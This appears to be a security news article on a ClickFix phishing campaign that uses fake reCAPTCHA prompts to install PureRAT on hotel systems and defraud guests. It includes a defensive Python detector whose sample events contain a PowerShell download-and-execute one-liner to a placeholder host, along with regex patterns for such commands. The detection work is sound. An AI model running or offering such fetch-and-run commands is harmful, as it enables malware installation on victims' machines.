ClickFix Phishing Campaign Targets Hotel Systems with PureRAT Malware

A sophisticated and ongoing phishing campaign has been observed targeting the global hospitality sector, leveraging the advanced “ClickFix” social engineering tactic to deploy PureRAT malware and steal sensitive credentials. This operation ultimately aims to defraud both hotel establishments and their customers, underscoring a growing threat to the travel industry’s digital infrastructure.

The campaign, active since at least April 2025, has focused on compromising accounts on major booking platforms like Booking.com and Expedia. Researchers at Sekoia identified that threat actors use compromised email accounts to send spear-phishing messages, mimicking legitimate communications from these platforms. This tactic highlights a concerning professionalization within cybercrime, where stolen booking data fuels a lucrative underground market.

The attack chain begins with deceptive emails that lure hotel staff to malicious websites employing the ClickFix social engineering technique. Victims are presented with a fake reCAPTCHA challenge or error message, instructing them to copy and execute a malicious PowerShell command. This command initiates a multi-stage infection process, which gathers system information and deploys a ZIP archive containing a binary. This binary then utilizes DLL side-loading to inject PureRAT, also known as zgRAT, into the compromised system.
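A defender's view of the first stage described above, added here as an example (not code from Sekoia or the article): it scans constructed Sysmon-style process-creation records for a command interpreter launched from a user context (explorer.exe as parent, as from the Run dialog) whose command line carries traits a pasted one-liner has but an interactive console does not. The field names, sample records and indicator list are assumptions.

```python
import re

# Constructed Sysmon-style process-creation records for illustration (not captured from the campaign).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -enc <BASE64_PLACEHOLDER>"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},  # admin opened an interactive console: benign
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File C:\\Scripts\\nightly-backup.ps1"},  # scheduled task: benign
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -c "iwr https://example.invalid/verify | iex"'},
]

# Parents that mean a person launched the command (Run dialog, Explorer address bar), not a script or scheduler.
USER_LAUNCH_PARENTS = {"explorer.exe"}
# Interpreters a ClickFix lure asks the victim to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line traits typical of a pasted one-liner (real PowerShell switches; list is an assumption).
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+\S+", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "remote_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|iex|invoke-expression)\b", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the matched indicator names, or [] when the event does not fit the ClickFix pattern."""
    if basename(event["ParentImage"]) not in USER_LAUNCH_PARENTS:
        return []
    if basename(event["Image"]) not in INTERPRETERS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]

def find_clickfix_candidates(events):
    """Return (index, indicators) for every event that matches the user-launched, obfuscated-interpreter pattern."""
    return [(i, hits) for i, e in enumerate(events) if (hits := score_event(e))]

if __name__ == "__main__":
    for idx, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']!r} -> {hits}")
```

The parent-process filter is what separates a pasted lure from routine automation; the same PowerShell switches launched by a scheduler are not flagged.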

PureRAT is a highly modular Remote Access Trojan (RAT) offering extensive capabilities, including remote access, keyboard and mouse control, webcam and microphone capture, keylogging, file transfer, and data exfiltration. The malware is further protected by .NET Reactor, which complicates reverse engineering efforts by security analysts, as reported by The Hacker News. Once PureRAT establishes persistence, attackers gain unauthorized access to critical booking management systems.

Stolen credentials from hotel systems are then exploited in two primary ways: they are either sold on cybercrime forums or directly leveraged to target hotel customers. In the latter scenario, guests receive fraudulent messages via WhatsApp or email, containing legitimate reservation details and prompting them to “verify” banking information to prevent booking cancellations. Unsuspecting customers are redirected to fake Booking.com or Expedia pages designed to harvest their card data, leading to financial fraud. The broader cybercrime ecosystem facilitates this fraud, with specialists known as “traffers” often outsourced for malware distribution, and “log checkers” used to validate stolen account credentials.

The ClickFix technique itself has evolved, with Push Security observing pages that include embedded videos, countdown timers, and adaptive instructions based on the victim’s operating system (Windows or macOS). These enhancements, combined with clipboard hijacking, make the lures more convincing and increase the likelihood of successful compromise. Microsoft has also tracked this activity under the moniker Storm-1865, emphasizing its global reach.

The proliferation of “as-a-service” models within cybercrime continues to lower entry barriers for attackers, reflecting a sophisticated and adaptive threat landscape that demands heightened vigilance from both the hospitality sector and its customers.